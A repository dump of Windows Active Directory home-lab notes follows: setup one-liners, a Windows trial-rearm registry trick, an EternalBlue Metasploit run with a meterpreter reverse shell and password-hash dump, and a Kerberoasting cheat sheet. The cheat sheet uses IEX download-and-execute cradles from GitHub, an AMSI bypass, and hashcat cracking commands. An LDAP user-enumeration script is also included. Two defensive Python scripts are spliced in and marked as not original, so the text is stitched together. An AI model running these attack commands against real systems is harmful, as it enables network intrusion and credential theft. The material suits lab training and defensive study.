├── Static_IP
├── Server_2019_DC
├── Rearm_Windows_10.md
├── Server_2008_R2_VM_Tools
├── MS17-010
├── Shares.md
├── Kerberoasting
├── Python_AD_Tooling.md
├── Active_Directory_Certificate_Service_ADCS.md
└── Hack_Lab_Domain.md
/Static_IP:
--------------------------------------------------------------------------------
1 | Note: in VMware the InterfaceAlias is Ethernet0.
2 | Note: in VirtualBox the InterfaceAlias is Ethernet.
3 |
4 | You need to add your chosen IP address, default gateway IP address, DNS IP and hostname.
5 |
6 | New-NetIPAddress -InterfaceAlias Ethernet0 -IPAddress Add-Your-Static-IP-Address -PrefixLength 24 -DefaultGateway Add-Your-Static-DG-IP-Address ; Set-DnsClientServerAddress -InterfaceAlias Ethernet0 -ServerAddresses Add-Your-Static-DNS-IP-Address,Add-Your-2nd-Static-DNS-IP-Address ; Rename-Computer -NewName "Add-Your-hostname" ; Restart-Computer
7 |
--------------------------------------------------------------------------------
/Server_2019_DC:
--------------------------------------------------------------------------------
1 | A PowerShell one-liner to convert your Server 2019 into a lab DC.
2 |
3 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force ; Install-WindowsFeature AD-Domain-Services ; Import-Module ADDSDeployment ; Install-ADDSForest -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2008R2" -DomainName "hacklab.local" -DomainNetbiosName "HACKLAB" -ForestMode "Win2008R2" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$true -SysvolPath "C:\Windows\SYSVOL" -Force:$true ; Add-WindowsFeature RSAT-AD-Tools ; Restart-Computer
4 |
--------------------------------------------------------------------------------
/Rearm_Windows_10.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | VM Rearm
4 |
5 | YOU CAN ONLY REARM WINDOWS 10!!!!!
6 |
7 |
8 | DOES NOT WORK FOR WIN 11
9 |
10 | CMD with admin privs
11 |
12 |
13 | See how many rearms you have left.
14 |
15 | ```
16 | slmgr /dlv
17 | ```
18 |
19 | Then to rearm
20 |
21 | ```
22 | slmgr /rearm
23 | ```
24 |
25 |
26 |
27 | After the 90-day trial period has expired, perform the following steps to get an additional 240-day trial period.
28 |
29 | Press Windows key + R to open a Run box.
30 |
31 | Type
32 | ```
33 | regedit
34 | ```
35 |
36 | and press Enter to open the Registry Editor. If the UAC (User Account Control) prompt appears, click Yes to grant admin access.
37 |
38 | Navigate to the following location:
39 | ```
40 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
41 | ```
42 |
43 | In the right pane, look for a DWORD (32-bit) registry value called SkipRearm.
44 |
45 | Double-click the SkipRearm value and change its value to 1.
46 |
47 | Restart Windows; you can now reset the Windows OS trial period eight more times (8 × 30 days = 240 days).
48 |
--------------------------------------------------------------------------------
/Server_2008_R2_VM_Tools:
--------------------------------------------------------------------------------
1 | The VM tools bundled with VM Workstation version 16X no longer support Server 2008 and fail during installation.
2 |
3 | Server 2008 R2 is end of life, and as such VM have stopped supporting it. I still use Server 2008 in my labs as it is still commonly used in the wild.
4 |
5 | The following is a workaround, for lab use only; it results in an older VM tools being installed.
6 |
7 | Spin up a copy of Server 2008 R2, then enable admin accounts' access to browse the internet.
8 |
9 | 1. Search for Server Manager / click on it to open
10 |
11 | 2. On the default Server Manager load page, scroll down and look for “Configure IE ESC”; it's in the right column under the “Security Information” settings / click on it.
12 |
13 | 3. Under Administrators, set the option to Off / click OK.
14 |
15 | You should then be able to browse to https://packages.vmware.com/tools/releases/ and download an older VM tools release which supports Server 2008 R2.
16 |
17 | Version used in my lab https://packages.vmware.com/tools/releases/10.3.5/windows/x64/VMware-tools-10.3.5-10430147-x86_64.exe
18 |
19 | 4. Download VMware-tools-10.3.5-10430147-x86_64.exe, right-click on it and run as admin; this should then install VM tools on your Server 2008 R2.
20 |
--------------------------------------------------------------------------------
/MS17-010:
--------------------------------------------------------------------------------
1 |
2 | Server version - Windows Server 2008 R2 Evaluation (180 days)
3 |
4 | https://www.microsoft.com/en-us/download/details.aspx?id=11093
5 |
6 | Verifying the version used for the lab
7 |
8 | PS C:\Users\LocalADM> (Get-WmiObject -class Win32_OperatingSystem).Caption
9 | Microsoft Windows Server 2008 R2 Datacenter
10 |
11 | PS C:\Users\LocalADM> [Environment]::OSVersion
12 |
13 | Platform ServicePack Version VersionString
14 | -------- ----------- ------- -------------
15 | Win32NT Service Pack 1 6.1.7601.65536 Microsoft Windows NT 6.1.7...
16 |
17 |
18 |
19 | MSF
20 |
21 | msf5 > use exploit/windows/smb/ms17_010_eternalblue
22 |
23 | msf5 > set rhosts 192.168.99.100
24 |
25 | set lhost 192.168.99.20
26 |
27 | msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
28 |
29 | msf5 exploit(windows/smb/ms17_010_eternalblue) > run -j
30 |
31 | [*] Started reverse TCP handler on 192.168.99.20:4444
32 | [*] 192.168.99.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
33 | [+] 192.168.99.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
34 | [*] 192.168.99.100:445 - Scanned 1 of 1 hosts (100% complete)
35 | [*] 192.168.99.100:445 - Connecting to target for exploitation.
36 | [+] 192.168.99.100:445 - Connection established for exploitation.
37 | [+] 192.168.99.100:445 - Target OS selected valid for OS indicated by SMB reply
38 | [*] 192.168.99.100:445 - CORE raw buffer dump (53 bytes)
39 | [*] 192.168.99.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
40 | [*] 192.168.99.100:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
41 | [*] 192.168.99.100:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P
42 | [*] 192.168.99.100:445 - 0x00000030 61 63 6b 20 31 ack 1
43 | [+] 192.168.99.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
44 | [*] 192.168.99.100:445 - Trying exploit with 12 Groom Allocations.
45 | [*] 192.168.99.100:445 - Sending all but last fragment of exploit packet
46 | [*] 192.168.99.100:445 - Starting non-paged pool grooming
47 | [+] 192.168.99.100:445 - Sending SMBv2 buffers
48 | [+] 192.168.99.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
49 | [*] 192.168.99.100:445 - Sending final SMBv2 buffers.
50 | [*] 192.168.99.100:445 - Sending last fragment of exploit packet!
51 | [*] 192.168.99.100:445 - Receiving response from exploit packet
52 | [+] 192.168.99.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
53 | [*] 192.168.99.100:445 - Sending egg to corrupted connection.
54 | [*] 192.168.99.100:445 - Triggering free of corrupted buffer.
55 | [*] Sending stage (206403 bytes) to 192.168.99.100
56 | [*] Meterpreter session 2 opened (192.168.99.20:4444 -> 192.168.99.100:49199) at 1948-01-15 01:06:58 +0000
57 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
58 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
59 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
60 |
61 |
62 | meterpreter > getsystem
63 | ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
64 |
65 | meterpreter > hashdump
66 | Administrator:500:aad3b435b51404eeaad3b477751404ee:fc525c9683e8fe0670957777971889:::
67 |
--------------------------------------------------------------------------------
/Shares.md:
--------------------------------------------------------------------------------
1 | A draft PowerShell one-liner to create shares on a server. Open PowerShell with admin privileges and copy and paste the line below.
2 |
3 | ```
4 | New-Item -Path "C:\files" -ItemType Directory -Force; Set-Content -Path "C:\files\readme.txt" -Value "happy golf fish password"; New-Item -Path "C:\files\happy" -ItemType Directory -Force; Set-Content -Path "C:\files\happy\sun.txt" -Value "happy clap golf password"; New-SmbShare -Name "files" -Path "C:\files" -FullAccess "Everyone"; Grant-SmbShareAccess -Name "files" -AccountName "Domain Users" -AccessRight Read -Force
5 |
6 | ```
7 |
8 | This is the response you should see.
9 |
10 | ```
11 | PS C:\Windows\system32> New-Item -Path "C:\files" -ItemType Directory -Force; Set-Content -Path "C:\files\readme.txt" -Value "happy golf fish password"; New-Item -Path "C:\files\happy" -ItemType Directory -Force; Set-Content -Path "C:\files\happy\sun.txt" -Value "happy clap golf password"; New-SmbShare -Name "files" -Path "C:\files" -FullAccess "Everyone"; Grant-SmbShareAccess -Name "files" -AccountName "Domain Users" -AccessRight Read -Force
12 |
13 |
14 | Directory: C:\
15 |
16 |
17 | Mode LastWriteTime Length Name
18 | ---- ------------- ------ ----
19 | d----- 28/11/2024 12:47 files
20 |
21 |
22 | Directory: C:\files
23 |
24 |
25 | Mode LastWriteTime Length Name
26 | ---- ------------- ------ ----
27 | d----- 28/11/2024 12:47 happy
28 |
29 | AvailabilityType : NonClustered
30 | CachingMode : Manual
31 | CATimeout : 0
32 | CompressData : False
33 | ConcurrentUserLimit : 0
34 | ContinuouslyAvailable : False
35 | CurrentUsers : 0
36 | Description :
37 | EncryptData : False
38 | FolderEnumerationMode : Unrestricted
39 | IdentityRemoting : False
40 | Infrastructure : False
41 | LeasingMode : Full
42 | Name : files
43 | Path : C:\files
44 | Scoped : False
45 | ScopeName : *
46 | SecurityDescriptor : O:SYG:SYD:(A;;FA;;;WD)
47 | ShadowCopy : False
48 | ShareState : Online
49 | ShareType : FileSystemDirectory
50 | SmbInstance : Default
51 | Special : False
52 | Temporary : False
53 | Volume : \\?\Volume{677a5d74-680b-4c27-87bd-20b4f085a124}\
54 | PSComputerName :
55 | PresetPathAcl : System.Security.AccessControl.DirectorySecurity
56 |
57 |
58 | AccessControlType : Allow
59 | AccessRight : Full
60 | AccountName : Everyone
61 | Name : files
62 | ScopeName : *
63 | PSComputerName :
64 |
65 |
66 | AccessControlType : Allow
67 | AccessRight : Read
68 | AccountName : HACKLAB\Domain Users
69 | Name : files
70 | ScopeName : *
71 | PSComputerName :
72 |
73 |
74 |
75 | PS C:\Windows\system32>
76 |
77 | ```
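
Added example (not part of the original repository): a Python check that parses the `SecurityDescriptor` SDDL string printed in the output above and reports allow ACEs granted to broad groups, with the level of access each one carries. The trustee list, function names and the two extra descriptors are assumptions made for illustration; only `O:SYG:SYD:(A;;FA;;;WD)` comes from this page.

```python
import re

# SDDL trustee aliases that cover large populations (a subset chosen for this example).
BROAD_TRUSTEES = {
    "WD": "Everyone",
    "AN": "Anonymous Logon",
    "AU": "Authenticated Users",
    "BU": "BUILTIN\\Users",
    "BG": "BUILTIN\\Guests",
    "DU": "Domain Users",
    "DG": "Domain Guests",
}

# SDDL rights mnemonics -> access-mask bits (file, generic and standard rights).
# Note: "WD" here is WRITE_DAC in the rights field, not the Everyone trustee alias.
RIGHTS = {
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}

FILE_ALL_ACCESS = 0x1F01FF
GENERIC_ALL = 0x10000000
# FILE_WRITE_DATA, FILE_APPEND_DATA, DELETE, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE
WRITE_BITS = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000 | 0x40000000


def parse_rights(text):
    """Turn an SDDL rights field ("FA", "FRFW", "0x1200a9") into an access mask."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        code = text[i:i + 2]
        if code not in RIGHTS:
            raise ValueError(f"unknown SDDL right {code!r}")
        mask |= RIGHTS[code]
    return mask


def dacl_aces(sddl):
    """Return the ACEs of the D: (DACL) part as dicts; empty list if there is no DACL."""
    match = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not match:
        return []
    aces = []
    for body in re.findall(r"\(([^()]*)\)", match.group(1)):
        # ACE layout: type;flags;rights;object_guid;inherit_object_guid;trustee
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE ({body})")
        aces.append({"type": fields[0],
                     "mask": parse_rights(fields[2]),
                     "trustee": fields[5]})
    return aces


def audit_share_sddl(sddl):
    """List (trustee, level) for every allow ACE held by a broad group."""
    findings = []
    for ace in dacl_aces(sddl):
        if ace["type"] != "A" or ace["trustee"] not in BROAD_TRUSTEES:
            continue
        mask = ace["mask"]
        if mask & GENERIC_ALL or (mask & FILE_ALL_ACCESS) == FILE_ALL_ACCESS:
            level = "full"
        elif mask & WRITE_BITS:
            level = "write"
        else:
            level = "read"
        findings.append((BROAD_TRUSTEES[ace["trustee"]], level))
    return findings


PAGE_SDDL = "O:SYG:SYD:(A;;FA;;;WD)"                         # from the output above
READ_ONLY_SDDL = "O:SYG:SYD:(A;;0x1200a9;;;DU)(A;;FA;;;BA)"  # constructed
CHANGE_SDDL = "O:SYG:SYD:(A;;0x1301bf;;;AU)"                 # constructed

if __name__ == "__main__":
    for sddl in (PAGE_SDDL, READ_ONLY_SDDL, CHANGE_SDDL):
        print(sddl, "->", audit_share_sddl(sddl))
```

The share ACL is only one of two checks: effective access is the more restrictive of the share permission and the NTFS ACL on `C:\files`.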
78 |
79 | Mounting from a remote host using an account belonging to the domain users group.
80 |
81 | ```
82 | C:\Users\g.white>pushd \\WIN-5EP48R94F9D\files
83 |
84 | Z:\>dir
85 | Volume in drive Z has no label.
86 | Volume Serial Number is AA05-C96A
87 |
88 | Directory of Z:\
89 |
90 | 28/11/2024 20:47 <DIR> .
91 | 28/11/2024 20:47 <DIR> happy
92 | 28/11/2024 20:47 26 readme.txt
93 | 1 File(s) 26 bytes
94 | 2 Dir(s) 49,526,321,152 bytes free
95 |
96 | Z:\>
97 |
98 | ```
99 |
100 | Hunting for defined words within the documents across the share's folders. Read this for more info on this method (https://github.com/myexploit/Hunt).
101 |
102 | ```
103 | Z:\>findstr /si password *.bat *.xml *.ini *.txt
104 | happy\sun.txt:happy clap golf password
105 | readme.txt:happy golf fish password
106 |
107 | Z:\>
108 |
109 | ```
110 |
111 | Once I get more time I will add a load of vulnerable shares to my https://github.com/myexploit/LAB/blob/master/Hack_Lab_Domain.md script, so you can enumerate for common words across an exposed network share.
112 |
--------------------------------------------------------------------------------
/Kerberoasting:
--------------------------------------------------------------------------------
1 | The following details how to set up Kerberoasting in your own Windows lab.
2 |
3 | -------------------------------
4 |
5 | Add users and create SPNs for them
6 |
7 | net user DA Passw0rd! /ADD /DOMAIN
8 | net user User1 Passw0rd! /ADD /DOMAIN
9 | net group "Domain Admins" DA /add
10 | setspn -s http/server1.hacklab.local:8080 DA
11 | setspn -s http/server1.hacklab.local:8081 User1
12 |
13 | -------------------------------
14 |
15 | Delete users and assigned SPNs
16 |
17 | setspn -d http/server1.hacklab.local:8080 DA
18 | setspn -d http/server1.hacklab.local:8081 User1
19 | net user DA /DELETE /DOMAIN
20 | net user User1 /DELETE /DOMAIN
21 |
22 | -------------------------------
23 |
24 | See all the assigned SPNs for a defined user
25 |
26 | setspn -L hacklab.local\service1
27 |
28 | Registered ServicePrincipalNames for CN=service1,CN=Users,DC=hacklab,DC=local:
29 | mssql/hacklab.local:80
30 | http/hacklab.local:80
31 |
32 | -------------------------------
33 |
34 | PowerShell one-liner to find all SPNs (tests all domain users)
35 |
36 | cls ; $search = New-Object DirectoryServices.DirectorySearcher([ADSI]"") ; $search.filter = "(servicePrincipalName=*)" ; $results = $search.Findall() ; foreach($result in $results) { $userEntry = $result.GetDirectoryEntry() ; Write-host "Object Name = " $userEntry.name -backgroundcolor "yellow" -foregroundcolor "black" ; Write-host "DN = " $userEntry.distinguishedName ; Write-host "Object Cat. = " $userEntry.objectCategory ; Write-host "servicePrincipalNames" ; $i=1 ; foreach($SPN in $userEntry.servicePrincipalName) { ; Write-host "SPN(" $i ") = " $SPN ; $i+=1 } ; Write-host "" }
37 |
38 | -------------------------------
39 |
40 | How to run Kerberoasting with PowerShell
41 |
42 | Runs and closes PS -w 1
43 |
44 | powershell -w 1 -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
45 |
46 | -------------------------------
47 |
48 | Without closing the PS session
49 |
50 | powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
51 |
52 | -------------------------------
53 |
54 | AMSI bypass works 05/06/2019 - Mohammed Danish https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9
55 |
56 | $webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
57 |
58 | -------------------------------
59 |
60 | How to load .ps1 locally
61 |
62 | powershell -ep bypass
63 | Import-module .\Invoke-Kerberoast.ps1 ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
64 |
65 | -------------------------------
66 |
67 | How to run Kerberoasting with C#
68 |
69 | https://github.com/GhostPack/Rubeus
70 |
71 | Rubeus.exe kerberoast /format:hashcat
72 |
73 | -------------------------------
74 |
75 | How to run Kerberoasting with impacket using Kali
76 |
77 | In Kali, add a static DNS entry for the full domain; the IP should point at the DC.
78 |
79 | gedit /etc/hosts
80 |
81 | Make sure you can ping the full domain.
82 |
83 | ./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name
84 |
85 | If it can connect to the DC it will prompt for a password.
86 |
87 | -------------------------------
88 |
89 | How to crack hashes collected from Kerberoasting
90 |
91 | hashcat64.exe -m 13100 "hash" "wordlist" --outfile="filename"
92 |
93 | hashcat64.exe -m 13100 "C:\Users\YepYepYep\Desktop\Kerb1" C:\Users\YepYepYep\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\YepYepYep\Desktop\Kerb1CrackedKerb-Hashes1.txt"
94 |
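
Added example, not part of the original notes: the tools above request a service ticket for each user account that carries an SPN, and hashcat mode 13100 targets RC4 (etype 23) tickets, so a run shows up on the DC as a burst of Event ID 4769 records with `TicketEncryptionType=0x17`. The Python below flags a requester that pulls RC4 tickets for several user-account services inside a short window; the one-line log layout, the threshold, the source addresses and the function names are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos etypes 0x17 (rc4-hmac) and 0x18 (rc4-hmac-exp).
RC4_ETYPES = {0x17, 0x18}

# Constructed 4769 records in an assumed "timestamp key=value ..." export layout.
SAMPLE_EVENTS = """\
2024-11-28T12:40:00 EventID=4769 TargetUserName=n.collins@HACKLAB.LOCAL ServiceName=WIN-8HPLF8PSHC1$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.99.31 Status=0x0
2024-11-28T12:41:00 EventID=4769 TargetUserName=n.collins@HACKLAB.LOCAL ServiceName=DA TicketEncryptionType=0x12 IpAddress=::ffff:192.168.99.31 Status=0x0
2024-11-28T12:50:01 EventID=4769 TargetUserName=g.white@HACKLAB.LOCAL ServiceName=DA TicketEncryptionType=0x17 IpAddress=::ffff:192.168.99.20 Status=0x0
2024-11-28T12:50:01 EventID=4769 TargetUserName=g.white@HACKLAB.LOCAL ServiceName=User1 TicketEncryptionType=0x17 IpAddress=::ffff:192.168.99.20 Status=0x0
2024-11-28T12:50:02 EventID=4769 TargetUserName=g.white@HACKLAB.LOCAL ServiceName=svc_mssql1 TicketEncryptionType=0x17 IpAddress=::ffff:192.168.99.20 Status=0x0
2024-11-28T13:30:00 EventID=4769 TargetUserName=p.davies@HACKLAB.LOCAL ServiceName=User1 TicketEncryptionType=0x17 IpAddress=::ffff:192.168.99.44 Status=0x0
""".splitlines()


def parse_line(line):
    """Split one exported record into a dict and parse its timestamp."""
    timestamp, *pairs = line.split()
    record = dict(pair.split("=", 1) for pair in pairs)
    record["time"] = datetime.fromisoformat(timestamp)
    return record


def is_rc4_user_service_ticket(record):
    """True for a successful 4769 that issued an RC4 ticket for a user-account service."""
    service = record.get("ServiceName", "")
    return (
        record.get("EventID") == "4769"
        and record.get("Status") == "0x0"
        and int(record.get("TicketEncryptionType", "0"), 16) in RC4_ETYPES
        and not service.endswith("$")          # computer accounts have long random keys
        and service.lower() != "krbtgt"
    )


def detect_kerberoast(lines, window=timedelta(minutes=5), min_services=2):
    """Report requesters that obtained RC4 tickets for >= min_services services in one window."""
    by_requester = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        record = parse_line(line)
        if is_rc4_user_service_ticket(record):
            by_requester[(record["TargetUserName"], record["IpAddress"])].append(record)

    alerts = []
    for (account, source), records in sorted(by_requester.items()):
        records.sort(key=lambda r: r["time"])
        best, start = set(), 0
        for end in range(len(records)):
            # Slide the window start forward until it spans at most `window`.
            while records[end]["time"] - records[start]["time"] > window:
                start += 1
            services = {r["ServiceName"] for r in records[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= min_services:
            alerts.append({"account": account, "source": source, "services": sorted(best)})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

With `min_services=1` the same function lists every RC4 ticket issued for a user-account service, which is a useful inventory of the accounts that should be moved to AES keys and long random passwords.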
--------------------------------------------------------------------------------
/Python_AD_Tooling.md:
--------------------------------------------------------------------------------
1 | These are draft scripts I’m just toying with.
2 |
3 |
4 | **Domain User account enumeration - authenticates with AD then dumps a copy of all domain usernames**
5 |
6 | Save the below as AD-Test99.py
7 |
8 | ```
9 | import argparse
10 | from ldap3 import Server, Connection, ALL, SUBTREE, core
11 | from ldap3.core.exceptions import LDAPException
12 |
13 | def authenticate(username, domain, password, domain_controller):
14 |     user_dn = f"{username}@{domain}"
15 |     server = Server(domain_controller, get_info=ALL)
16 |
17 |     try:
18 |         conn = Connection(server, user=user_dn, password=password, auto_bind=True)
19 |         if conn.bind():
20 |             print("Authentication successful")
21 |             return conn
22 |         else:
23 |             print("Authentication failed")
24 |             return None
25 |     except LDAPException as e:
26 |         print(f"LDAPException: {e}")
27 |         print("Invalid credentials. Authentication failed.")
28 |         return None
29 |
30 | def get_all_usernames(conn, search_base):
31 |     page_size = 1000
32 |     cookie = None
33 |     usernames = []
34 |
35 |     while True:
36 |         conn.search(
37 |             search_base,
38 |             '(objectClass=user)',
39 |             attributes=['sAMAccountName'],
40 |             paged_size=page_size,
41 |             paged_cookie=cookie
42 |         )
43 |
44 |         if conn.entries:
45 |             for entry in conn.entries:
46 |                 usernames.append(entry.sAMAccountName.value)
47 |
48 |         cookie = conn.result['controls']['1.2.840.113556.1.4.319']['value']['cookie']
49 |
50 |         if not cookie:
51 |             break
52 |
53 |     if usernames:
54 |         print("List of usernames:")
55 |         for username in usernames:
56 |             print(username)
57 |     else:
58 |         print("No users found or unable to retrieve user list.")
59 |
60 | if __name__ == "__main__":
61 |     parser = argparse.ArgumentParser(description="Authenticate and optionally list AD users")
62 |     parser.add_argument("-u", "--username", required=True, help="Username")
63 |     parser.add_argument("-p", "--password", required=True, help="Password")
64 |     parser.add_argument("-d", "--domain", required=True, help="Domain")
65 |     parser.add_argument("-dc", "--domain_controller", required=True, help="Domain Controller Hostname")
66 |     parser.add_argument("-UN", "--usernames", action="store_true", help="Enumerate and display all domain usernames")
67 |
68 |     args = parser.parse_args()
69 |
70 |     conn = authenticate(args.username, args.domain, args.password, args.domain_controller)
71 |
72 |     if conn and args.usernames:
73 |         search_base = f"dc={args.domain.replace('.', ',dc=')}"
74 |         get_all_usernames(conn, search_base)
75 |         conn.unbind()
76 |
77 | ```
78 |
79 | **Demo Domain User account enumeration**
80 |
81 | ```
82 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 AD-Test99.py -u g.white -p 'Passw0rd!' -d hacklab.local -dc WIN-8HPLF8PSHC1.hacklab.local -UN
83 | Authentication successful
84 | List of usernames:
85 | Administrator
86 | Guest
87 | WIN-8HPLF8PSHC1$
88 | krbtgt
89 | da1
90 | n.collins
91 | o.davidson
92 | p.davies
93 | q.dawson
94 | u.dixon
95 | r.edwards
96 | s.elliot
97 | t.evans
98 | u.fisher
99 | v.fletcher
100 | w.ford
101 | x.foster
102 | y.fox
103 | z.gibson
104 | a.graham
105 | b.grant
106 | c.gray
107 | d.green
108 | b.smith
109 | c.johnason
110 | d.thomas
111 | e.miller
112 | f.johnsson
113 | g.williams
114 | t.harris
115 | i.jackson
116 | t.wilsson
117 | k.mmoore
118 | l.martsinez
119 | m.marjtinez
120 | n.anderson
121 | o.thompson
122 | p.thompson
123 | q.lewis
124 | r.robinson
125 | s.sancshez
126 | t.clark
127 | u.hernandez
128 | v.hill
129 | w.king
130 | x.rossi
131 | y.darrdvis
132 | z.perez
133 | a.white
134 | b.jackson
135 | c.smith
136 | d.taylor
137 | e.martin
138 | f.thoffmas
139 | g.hernandez
140 | h.rodrgviguez
141 | i.johncson
142 | j.miller
143 | k.jones
144 | l.davsris
145 | m.andessrson
146 | y.johnfson
147 | o.mooore
148 | p.clark
149 | q.thomdas
150 | r.martianez
151 | s.wiloson
152 | t.robinson
153 | u.marteinez
154 | v.sancahez
155 | w.moorre
156 | x.thompson
157 | y.martsinez
158 | z.hernandez
159 | a.miller
160 | b.rodriseguez
161 | c.anderson
162 | d.sancahez
163 | e.wilison
164 | f.davrtsis
165 | g.mooree
166 | h.thomddfas
167 | z.johnsson
168 | j.martainez
169 | k.rodrigfduez
170 | l.sanchdez
171 | m.clark
172 | n.davdemis
173 | o.wilwson
174 | p.robinson
175 | q.hernandez
176 | r.martiynez
177 | s.anderson
178 | t.johnsron
179 | u.rodrigkjuez
180 | v.sancghez
181 | w.wilsaon
182 | x.davifis
183 | y.moossre
184 | z.thomssas
185 | a.martinuez
186 | b.hernandez
187 | c.robinson
188 | d.clark
189 | e.jodhnson
190 | f.sanwchez
191 | g.wilpson
192 | h.davxris
193 | i.moofrre
194 | j.massrtainez
195 | k.rodrijguez
196 | l.sancahez
197 | m.anderson
198 | n.johnsson
199 | o.martiwnez
200 | p.hernandez
201 | q.wiloson
202 | r.davirws
203 | s.moewore
204 | t.thoweermas
205 | u.johnslon
206 | v.martienez
207 | w.rodrisguez
208 | x.sanchgez
209 | y.wilison
210 | z.davsdis
211 | a.clark
212 | b.johndson
213 | c.martiwnez
214 | d.rodrigruez
215 | e.sanchjez
216 | f.wilyson
217 | g.davioos
218 | h.mooeere
219 | i.thomas
220 | j.johnhson
221 | k.martiunez
222 | l.rodrigiuez
223 | m.sanychez
224 | n.wiwlson
225 | o.daviuus
226 | p.moorrre
227 | q.thdddomas
228 | r.johntson
229 | s.marttinez
230 | t.rodrieguez
231 | u.sancrhez
232 | v.wilsion
233 | w.davccis
234 | x.moowsxre
235 | y.thomeeeas
236 | z.johnqson
237 | a.martwinez
238 | b.rodrigutuez
239 | c.sanczhez
240 | d.wilsuion
241 | e.daerfvis
242 | f.mooure
243 | g.thomeeeas
244 | h.johnsson
245 | i.martinwez
246 | j.rodrwyiguez
247 | k.sanchiez
248 | l.wilyson
249 | m.davssis
250 | n.moorcre
251 | o.thomderas
252 | p.johnsson
253 | q.maratinez
254 | r.rodrieyguez
255 | s.sancyhez
256 | t.wilseon
257 | u.daytvis
258 | v.mocdore
259 | w.thomattts
260 | x.johnsaon
261 | y.martihnez
262 | z.rodrirtguez
263 | a.sanchtez
264 | b.wilswon
265 | c.davyis
266 | d.moodsre
267 | e.thomfffas
268 | f.johnso
269 | g.martinjez
270 | h.rodrigwuez
271 | i.sancohez
272 | j.wilesosn
273 | k.dawerris
274 | l.moouiyre
275 | m.thogghmas
276 | n.johseeson
277 | o.martidnez
278 | p.rodrasiguez
279 | q.sanchpez
280 | r.wilsson
281 | s.daveeris
282 | t.moodce
283 | u.thomhhas
284 | v.jhnson
285 | w.martfinez
286 | x.rodrifguez
287 | y.sancuhez
288 | z.wilsaon
289 | a.davihhuus
290 | b.mootfre
291 | c.thomhhsas
292 | d.johnsaon
293 | e.martidfnez
294 | f.rodridfguez
295 | g.sancthez
296 | h.wilzson
297 | i.davffis
298 | j.moodckre
299 | k.thomeweas
300 | l.johnon
301 | m.martiynez
302 | n.rodrsiguez
303 | o.sanrchez
304 | p.wiltson
305 | q.davfwfis
306 | r.mooyre
307 | m.jenkins
308 | n.johnson
309 | o.jones
310 | g.white
311 | h.yalden
312 | i.yarbury
313 | j.yardley
314 | z.mcdonald
315 | a.murphy
316 | b.natt
317 | c.nelson
318 | d.nightingale
319 | e.nixon
320 | f.nutter
321 | p.kelly
322 | q.kennedy
323 | u.king
324 | r.knight
325 | s.lawrence
326 | t.lee
327 | u.lewis
328 | v.lloyd
329 | w.marshall
330 | x.martin
331 | y.mason
332 | g.dell
333 | h.osborne
334 | i.owen
335 | j.oxley
336 | k.page
